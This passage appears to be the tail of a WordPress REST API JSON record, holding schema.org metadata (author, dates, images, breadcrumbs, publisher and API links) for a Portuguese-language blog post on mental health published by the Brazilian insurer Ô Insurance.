minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#article","isPartOf":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/"},"author":{"name":"Rafael Gesser","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223"},"headline":"Sa\u00fade mental: o que \u00e9 e como cuidar da sua","datePublished":"2020-09-09T19:53:35+00:00","dateModified":"2020-09-10T15:02:30+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/"},"wordCount":819,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg","inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/","url":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/","name":"Sa\u00fade mental: saiba o que \u00e9 e como cuidar da sua","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg","datePublished":"2020-09-09T19:53:35+00:00","dateModified":"2020-09-10T15:02:30+00:00","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/08\/ANS-plano-de-saude-2-scaled.jpg","width":2560,"height":888,"caption":"ANS-plano-de-saude"},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/dia-da-saude-mental-o-que-e-e-como-cuidar-da-sua\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Sa\u00fade mental: o que \u00e9 e como cuidar da sua"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2996"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=2996"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2996\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/2972"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=2996"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=2996"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=2996"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}